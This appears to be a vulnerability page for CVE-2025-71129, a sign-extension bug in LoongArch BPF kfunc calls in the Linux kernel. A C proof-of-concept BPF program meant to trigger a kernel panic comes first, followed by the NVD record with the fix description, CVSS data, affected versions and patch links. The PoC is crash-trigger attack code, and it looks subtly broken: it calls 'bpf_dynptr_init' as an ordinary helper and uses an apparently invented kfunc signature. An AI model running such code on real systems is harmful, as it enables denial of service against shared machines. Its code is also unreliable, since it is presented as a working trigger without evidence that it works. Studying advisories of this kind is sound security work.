CVE-2025-71129

// PoC: Linux Kernel LoongArch BPF kfunc Sign Extension Vulnerability // This PoC demonstrates triggering the vulnerability through BPF program // Note: Requires LoongArch architecture and low-privilege local access #include <linux/bpf.h> #include <bpf/bpf_helpers.h> #include <linux/ptrace.h> // Declare kfunc that will be called extern int bpf_kfunc_call_test(struct bpf_dynptr *ctx, int arg1, int arg2); SEC("tracepoint/syscalls/sys_enter_write") int handle_tp(void *ctx) { struct bpf_dynptr ptr; int arg1, arg2; int result; // Initialize dynptr bpf_dynptr_init(&ptr, NULL, 0, 0); // Craft arguments that require sign extension // These values will trigger improper sign extension if not handled correctly arg1 = 0xFFFFFFFF; // Negative value requiring sign extension arg2 = 0x80000000; // Value needing proper extension on 64-bit register // Call kfunc with crafted arguments // On vulnerable kernel: arguments not properly sign-extended // May cause kernel panic or undefined behavior result = bpf_kfunc_call_test(&ptr, arg1, arg2); return 0; } char LICENSE[] SEC("license") = "GPL";

{"cve": {"id": "CVE-2025-71129", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:02.647", "lastModified": "2026-03-25T18:53:09.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nLoongArch: BPF: Sign extend kfunc call arguments\n\nThe kfunc calls are native calls so they should follow LoongArch calling\nconventions. Sign extend its arguments properly to avoid kernel panic.\nThis is done by adding a new emit_abi_ext() helper. The emit_abi_ext()\nhelper performs extension in place meaning a value already store in the\ntarget register (Note: this is different from the existing sign_extend()\nhelper and thus we can't reuse it)."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nLoongArch: BPF: Extensión de signo de los argumentos de llamada a kfunc\n\nLas llamadas a kfunc son llamadas nativas, por lo que deben seguir las convenciones de llamada de LoongArch. Extender el signo de sus argumentos correctamente para evitar un pánico del kernel. Esto se logra añadiendo una nueva función auxiliar emit_abi_ext(). La función auxiliar emit_abi_ext() realiza la extensión in situ, lo que significa un valor ya almacenado en el registro de destino (Nota: esto es diferente de la función auxiliar sign_extend() existente y, por lo tanto, no podemos reutilizarla)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.1", "versionEndExcluding": "6.6.120", "matchCriteriaId": "9EA0788E-D2BB-4928-95FD-41A8295CB176"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.4", "matchCriteriaId": "DC988EA0-0E32-457A-BF95-89BEB31A227B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:-:*:*:*:*:*:*", "matchCriteriaId": "DE093B34-F4CD-4052-8122-730D6537A91A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0d666db731e95890e0eda7ea61bc925fd2be90c6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/321993a874f571a94b5a596f1132f798c663b56e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3f5a238f24d7b75f9efe324d3539ad388f58536e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fd43edf357a3a1f5ed1c4bf450b60001c9091c39", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}